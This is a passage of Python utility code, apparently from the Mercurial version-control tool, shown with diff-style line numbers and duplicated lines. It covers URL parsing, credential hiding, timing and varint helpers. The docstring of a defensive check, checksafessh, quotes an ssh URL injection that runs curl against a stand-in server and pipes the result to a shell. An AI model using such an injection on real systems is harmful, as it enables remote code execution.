    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" work fine, as we do not support Python < 2.7.4.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.

    def iterfile(fp):
        """Return an iterator over ``fp`` that is safe against EINTR."""
        fastpath = True
        # only plain on-disk files (py2 'file' objects) take the fast path
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            # fp.readline deals with EINTR correctly, use it as a workaround.
            return iter(fp.readline, b'')


else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2906
2917
2907
2918
def iterlines(iterator):
    # type: (Iterator[bytes]) -> Iterator[bytes]
    """Flatten an iterable of byte chunks into the lines they contain.

    Each chunk is split independently, so a line spanning a chunk
    boundary is yielded in pieces.
    """
    return itertools.chain.from_iterable(
        chunk.splitlines() for chunk in iterator
    )
2913
2924
2914
2925
def expandpath(path):
    # type: (bytes) -> bytes
    """Expand ``$VAR`` environment references, then a leading ``~``."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2918
2929
2919
2930
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    alternatives = b'|'.join(mapping.keys())
    if escape_prefix:
        # a doubled prefix escapes itself: map the bare prefix character
        # to itself and let the pattern match it
        alternatives += b'|' + prefix
        prefix_char = prefix[1:] if len(prefix) > 1 else prefix
        mapping[prefix_char] = prefix_char
    pattern = remod.compile(br'%s(%s)' % (prefix, alternatives))

    def _substitute(match):
        # strip the one-character prefix, look up, then post-process
        return fn(mapping[match.group()[1:]])

    return pattern.sub(_substitute, s)
2944
2955
2945
2956
def getport(port):
    # type: (Union[bytes, int]) -> int
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # not numeric; fall through to a service-name lookup below
        pass

    servicename = pycompat.sysstr(port)
    try:
        return socket.getservbyname(servicename)
    except socket.error:
        raise error.Abort(
            _(b"no port number associated with service '%s'") % port
        )
2965
2976
2966
2977
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = b"!~*'()+"
    _safepchars = b"/!~*'()+:\\"
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # type: (bytes, bool, bool) -> None
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self):
        # Shallow copy of all parsed components; the placeholder argument
        # is immediately overwritten field by field below.
        u = url(b'temporary useless value')
        u.path = self.path
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        # NOTE(review): u.path is assigned twice (also above); harmless.
        u.path = self.path
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        # Include only the components that were actually parsed (non-None).
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                # bracketed IPv6 literals are emitted verbatim
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        # Render the URL without credentials, then restore them; the
        # credential-free form is what the password manager expects.
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        # type: () -> bytes
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
3310
3321
3311
3322
def hasscheme(path):
    # type: (bytes) -> bool
    """Return True when *path* parses with an explicit URL scheme."""
    parsed = url(path)
    # explicit bool() cast helps pytype pin down the return type
    return bool(parsed.scheme)
3315
3326
3316
3327
def hasdriveletter(path):
    # type: (bytes) -> bool
    """Return True when *path* starts with a Windows drive letter (b'c:')."""
    if not path:
        return False
    return path[0:1].isalpha() and path[1:2] == b':'
3320
3331
3321
3332
def urllocalpath(path):
    # type: (bytes) -> bytes
    """Parse *path* as a URL (query/fragment kept inline) and return its
    local filesystem form."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3325
3336
3326
3337
def checksafessh(path):
    # type: (bytes) -> None
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    # a host beginning with '-' would be parsed by ssh as an option
    if path.startswith((b'ssh://-', b'svn+ssh://-')):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
        )
3343
3354
3344
3355
def hidepassword(u):
    # type: (bytes) -> bytes
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
3352
3363
3353
3364
def removeauth(u):
    # type: (bytes) -> bytes
    '''remove all authentication information from a url string'''
    parsed = url(u)
    parsed.user = None
    parsed.passwd = None
    return bytes(parsed)
3360
3371
3361
3372
# Human-readable formatter for a duration given in seconds; built from
# (precision-threshold, divisor, format) triples covering s down to ns.
# Exact selection semantics live in unitcountfn (defined elsewhere in this
# module) — presumably the first matching triple wins; verify there.
timecount = unitcountfn(
    (1, 1e3, _(b'%.0f s')),
    (100, 1, _(b'%.1f s')),
    (10, 1, _(b'%.2f s')),
    (1, 1, _(b'%.3f s')),
    (100, 0.001, _(b'%.1f ms')),
    (10, 0.001, _(b'%.2f ms')),
    (1, 0.001, _(b'%.3f ms')),
    (100, 0.000001, _(b'%.1f us')),
    (10, 0.000001, _(b'%.2f us')),
    (1, 0.000001, _(b'%.3f us')),
    (100, 0.000000001, _(b'%.1f ns')),
    (10, 0.000000001, _(b'%.2f ns')),
    (1, 0.000000001, _(b'%.3f ns')),
)
3377
3388
3378
3389
@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution is
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated
    # when the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        # elapsed == 0 means the context has not exited yet
        return timecount(self.elapsed) if self.elapsed else b'<unknown>'

    __str__ = encoding.strmethod(__bytes__)
3396
3407
3397
3408
@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        # record the elapsed time and pop one nesting level even when the
        # managed block raises
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1


# module-level nesting counter consumed by timedcm itself
timedcm._nested = 0
3419
3430
3420
3431
def timed(func):
    """Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    """

    def wrapper(*args, **kwargs):
        funcname = pycompat.bytestr(func.__name__)
        with timedcm(funcname) as time_stats:
            result = func(*args, **kwargs)
        # indent by nesting depth so nested timings read as a tree
        indent = b' ' * time_stats.level * 2
        procutil.stderr.write(
            b'%s%s: %s\n' % (indent, funcname, time_stats)
        )
        return result

    return wrapper
3447
3458
3448
3459
# (suffix, multiplier) pairs for sizetoint; tried in this exact order, so
# the longer b'kb'/b'mb'/b'gb' forms must come before the bare b'b'.
_sizeunits = (
    (b'm', 2 ** 20),
    (b'k', 2 ** 10),
    (b'g', 2 ** 30),
    (b'kb', 2 ** 10),
    (b'mb', 2 ** 20),
    (b'gb', 2 ** 30),
    (b'b', 1),
)


def sizetoint(s):
    # type: (bytes) -> int
    """Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    """
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                magnitude = float(spec[: -len(suffix)])
                return int(magnitude * multiplier)
        return int(spec)
    except ValueError:
        raise error.ParseError(_(b"couldn't parse size: %s") % s)
3479
3490
3480
3491
3481 class hooks(object):
3492 class hooks(object):
3482 """A collection of hook functions that can be used to extend a
3493 """A collection of hook functions that can be used to extend a
3483 function's behavior. Hooks are called in lexicographic order,
3494 function's behavior. Hooks are called in lexicographic order,
3484 based on the names of their sources."""
3495 based on the names of their sources."""
3485
3496
3486 def __init__(self):
3497 def __init__(self):
3487 self._hooks = []
3498 self._hooks = []
3488
3499
3489 def add(self, source, hook):
3500 def add(self, source, hook):
3490 self._hooks.append((source, hook))
3501 self._hooks.append((source, hook))
3491
3502
3492 def __call__(self, *args):
3503 def __call__(self, *args):
3493 self._hooks.sort(key=lambda x: x[0])
3504 self._hooks.sort(key=lambda x: x[0])
3494 results = []
3505 results = []
3495 for source, hook in self._hooks:
3506 for source, hook in self._hooks:
3496 results.append(hook(*args))
3507 results.append(hook(*args))
3497 return results
3508 return results
3498
3509
3499
3510
3500 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3511 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3501 """Yields lines for a nicely formatted stacktrace.
3512 """Yields lines for a nicely formatted stacktrace.
3502 Skips the 'skip' last entries, then return the last 'depth' entries.
3513 Skips the 'skip' last entries, then return the last 'depth' entries.
3503 Each file+linenumber is formatted according to fileline.
3514 Each file+linenumber is formatted according to fileline.
3504 Each line is formatted according to line.
3515 Each line is formatted according to line.
3505 If line is None, it yields:
3516 If line is None, it yields:
3506 length of longest filepath+line number,
3517 length of longest filepath+line number,
3507 filepath+linenumber,
3518 filepath+linenumber,
3508 function
3519 function
3509
3520
3510 Not be used in production code but very convenient while developing.
3521 Not be used in production code but very convenient while developing.
3511 """
3522 """
3512 entries = [
3523 entries = [
3513 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3524 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3514 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3525 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3515 ][-depth:]
3526 ][-depth:]
3516 if entries:
3527 if entries:
3517 fnmax = max(len(entry[0]) for entry in entries)
3528 fnmax = max(len(entry[0]) for entry in entries)
3518 for fnln, func in entries:
3529 for fnln, func in entries:
3519 if line is None:
3530 if line is None:
3520 yield (fnmax, fnln, func)
3531 yield (fnmax, fnln, func)
3521 else:
3532 else:
3522 yield line % (fnmax, fnln, func)
3533 yield line % (fnmax, fnln, func)
3523
3534
3524
3535
3525 def debugstacktrace(
3536 def debugstacktrace(
3526 msg=b'stacktrace',
3537 msg=b'stacktrace',
3527 skip=0,
3538 skip=0,
3528 f=procutil.stderr,
3539 f=procutil.stderr,
3529 otherf=procutil.stdout,
3540 otherf=procutil.stdout,
3530 depth=0,
3541 depth=0,
3531 prefix=b'',
3542 prefix=b'',
3532 ):
3543 ):
3533 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3544 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3534 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3545 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3535 By default it will flush stdout first.
3546 By default it will flush stdout first.
3536 It can be used everywhere and intentionally does not require an ui object.
3547 It can be used everywhere and intentionally does not require an ui object.
3537 Not be used in production code but very convenient while developing.
3548 Not be used in production code but very convenient while developing.
3538 """
3549 """
3539 if otherf:
3550 if otherf:
3540 otherf.flush()
3551 otherf.flush()
3541 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3552 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3542 for line in getstackframes(skip + 1, depth=depth):
3553 for line in getstackframes(skip + 1, depth=depth):
3543 f.write(prefix + line)
3554 f.write(prefix + line)
3544 f.flush()
3555 f.flush()
3545
3556
3546
3557
3547 # convenient shortcut
3558 # convenient shortcut
3548 dst = debugstacktrace
3559 dst = debugstacktrace
3549
3560
3550
3561
3551 def safename(f, tag, ctx, others=None):
3562 def safename(f, tag, ctx, others=None):
3552 """
3563 """
3553 Generate a name that it is safe to rename f to in the given context.
3564 Generate a name that it is safe to rename f to in the given context.
3554
3565
3555 f: filename to rename
3566 f: filename to rename
3556 tag: a string tag that will be included in the new name
3567 tag: a string tag that will be included in the new name
3557 ctx: a context, in which the new name must not exist
3568 ctx: a context, in which the new name must not exist
3558 others: a set of other filenames that the new name must not be in
3569 others: a set of other filenames that the new name must not be in
3559
3570
3560 Returns a file name of the form oldname~tag[~number] which does not exist
3571 Returns a file name of the form oldname~tag[~number] which does not exist
3561 in the provided context and is not in the set of other names.
3572 in the provided context and is not in the set of other names.
3562 """
3573 """
3563 if others is None:
3574 if others is None:
3564 others = set()
3575 others = set()
3565
3576
3566 fn = b'%s~%s' % (f, tag)
3577 fn = b'%s~%s' % (f, tag)
3567 if fn not in ctx and fn not in others:
3578 if fn not in ctx and fn not in others:
3568 return fn
3579 return fn
3569 for n in itertools.count(1):
3580 for n in itertools.count(1):
3570 fn = b'%s~%s~%s' % (f, tag, n)
3581 fn = b'%s~%s~%s' % (f, tag, n)
3571 if fn not in ctx and fn not in others:
3582 if fn not in ctx and fn not in others:
3572 return fn
3583 return fn
3573
3584
3574
3585
3575 def readexactly(stream, n):
3586 def readexactly(stream, n):
3576 '''read n bytes from stream.read and abort if less was available'''
3587 '''read n bytes from stream.read and abort if less was available'''
3577 s = stream.read(n)
3588 s = stream.read(n)
3578 if len(s) < n:
3589 if len(s) < n:
3579 raise error.Abort(
3590 raise error.Abort(
3580 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3591 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3581 % (len(s), n)
3592 % (len(s), n)
3582 )
3593 )
3583 return s
3594 return s
3584
3595
3585
3596
3586 def uvarintencode(value):
3597 def uvarintencode(value):
3587 """Encode an unsigned integer value to a varint.
3598 """Encode an unsigned integer value to a varint.
3588
3599
3589 A varint is a variable length integer of 1 or more bytes. Each byte
3600 A varint is a variable length integer of 1 or more bytes. Each byte
3590 except the last has the most significant bit set. The lower 7 bits of
3601 except the last has the most significant bit set. The lower 7 bits of
3591 each byte store the 2's complement representation, least significant group
3602 each byte store the 2's complement representation, least significant group
3592 first.
3603 first.
3593
3604
3594 >>> uvarintencode(0)
3605 >>> uvarintencode(0)
3595 '\\x00'
3606 '\\x00'
3596 >>> uvarintencode(1)
3607 >>> uvarintencode(1)
3597 '\\x01'
3608 '\\x01'
3598 >>> uvarintencode(127)
3609 >>> uvarintencode(127)
3599 '\\x7f'
3610 '\\x7f'
3600 >>> uvarintencode(1337)
3611 >>> uvarintencode(1337)
3601 '\\xb9\\n'
3612 '\\xb9\\n'
3602 >>> uvarintencode(65536)
3613 >>> uvarintencode(65536)
3603 '\\x80\\x80\\x04'
3614 '\\x80\\x80\\x04'
3604 >>> uvarintencode(-1)
3615 >>> uvarintencode(-1)
3605 Traceback (most recent call last):
3616 Traceback (most recent call last):
3606 ...
3617 ...
3607 ProgrammingError: negative value for uvarint: -1
3618 ProgrammingError: negative value for uvarint: -1
3608 """
3619 """
3609 if value < 0:
3620 if value < 0:
3610 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3621 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3611 bits = value & 0x7F
3622 bits = value & 0x7F
3612 value >>= 7
3623 value >>= 7
3613 bytes = []
3624 bytes = []
3614 while value:
3625 while value:
3615 bytes.append(pycompat.bytechr(0x80 | bits))
3626 bytes.append(pycompat.bytechr(0x80 | bits))
3616 bits = value & 0x7F
3627 bits = value & 0x7F
3617 value >>= 7
3628 value >>= 7
3618 bytes.append(pycompat.bytechr(bits))
3629 bytes.append(pycompat.bytechr(bits))
3619
3630
3620 return b''.join(bytes)
3631 return b''.join(bytes)
3621
3632
3622
3633
3623 def uvarintdecodestream(fh):
3634 def uvarintdecodestream(fh):
3624 """Decode an unsigned variable length integer from a stream.
3635 """Decode an unsigned variable length integer from a stream.
3625
3636
3626 The passed argument is anything that has a ``.read(N)`` method.
3637 The passed argument is anything that has a ``.read(N)`` method.
3627
3638
3628 >>> try:
3639 >>> try:
3629 ... from StringIO import StringIO as BytesIO
3640 ... from StringIO import StringIO as BytesIO
3630 ... except ImportError:
3641 ... except ImportError:
3631 ... from io import BytesIO
3642 ... from io import BytesIO
3632 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3643 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3633 0
3644 0
3634 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3645 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3635 1
3646 1
3636 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3647 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3637 127
3648 127
3638 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3649 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3639 1337
3650 1337
3640 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3651 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3641 65536
3652 65536
3642 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3653 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3643 Traceback (most recent call last):
3654 Traceback (most recent call last):
3644 ...
3655 ...
3645 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3656 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3646 """
3657 """
3647 result = 0
3658 result = 0
3648 shift = 0
3659 shift = 0
3649 while True:
3660 while True:
3650 byte = ord(readexactly(fh, 1))
3661 byte = ord(readexactly(fh, 1))
3651 result |= (byte & 0x7F) << shift
3662 result |= (byte & 0x7F) << shift
3652 if not (byte & 0x80):
3663 if not (byte & 0x80):
3653 return result
3664 return result
3654 shift += 7
3665 shift += 7
3655
3666
3656
3667
3657 # Passing the '' locale means that the locale should be set according to the
3668 # Passing the '' locale means that the locale should be set according to the
3658 # user settings (environment variables).
3669 # user settings (environment variables).
3659 # Python sometimes avoids setting the global locale settings. When interfacing
3670 # Python sometimes avoids setting the global locale settings. When interfacing
3660 # with C code (e.g. the curses module or the Subversion bindings), the global
3671 # with C code (e.g. the curses module or the Subversion bindings), the global
3661 # locale settings must be initialized correctly. Python 2 does not initialize
3672 # locale settings must be initialized correctly. Python 2 does not initialize
3662 # the global locale settings on interpreter startup. Python 3 sometimes
3673 # the global locale settings on interpreter startup. Python 3 sometimes
3663 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3674 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3664 # explicitly initialize it to get consistent behavior if it's not already
3675 # explicitly initialize it to get consistent behavior if it's not already
3665 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3676 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3666 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3677 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3667 # if we can remove this code.
3678 # if we can remove this code.
3668 @contextlib.contextmanager
3679 @contextlib.contextmanager
3669 def with_lc_ctype():
3680 def with_lc_ctype():
3670 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3681 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3671 if oldloc == 'C':
3682 if oldloc == 'C':
3672 try:
3683 try:
3673 try:
3684 try:
3674 locale.setlocale(locale.LC_CTYPE, '')
3685 locale.setlocale(locale.LC_CTYPE, '')
3675 except locale.Error:
3686 except locale.Error:
3676 # The likely case is that the locale from the environment
3687 # The likely case is that the locale from the environment
3677 # variables is unknown.
3688 # variables is unknown.
3678 pass
3689 pass
3679 yield
3690 yield
3680 finally:
3691 finally:
3681 locale.setlocale(locale.LC_CTYPE, oldloc)
3692 locale.setlocale(locale.LC_CTYPE, oldloc)
3682 else:
3693 else:
3683 yield
3694 yield
3684
3695
3685
3696
3686 def _estimatememory():
3697 def _estimatememory():
3687 # type: () -> Optional[int]
3698 # type: () -> Optional[int]
3688 """Provide an estimate for the available system memory in Bytes.
3699 """Provide an estimate for the available system memory in Bytes.
3689
3700
3690 If no estimate can be provided on the platform, returns None.
3701 If no estimate can be provided on the platform, returns None.
3691 """
3702 """
3692 if pycompat.sysplatform.startswith(b'win'):
3703 if pycompat.sysplatform.startswith(b'win'):
3693 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3704 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3694 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3705 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3695 from ctypes.wintypes import ( # pytype: disable=import-error
3706 from ctypes.wintypes import ( # pytype: disable=import-error
3696 Structure,
3707 Structure,
3697 byref,
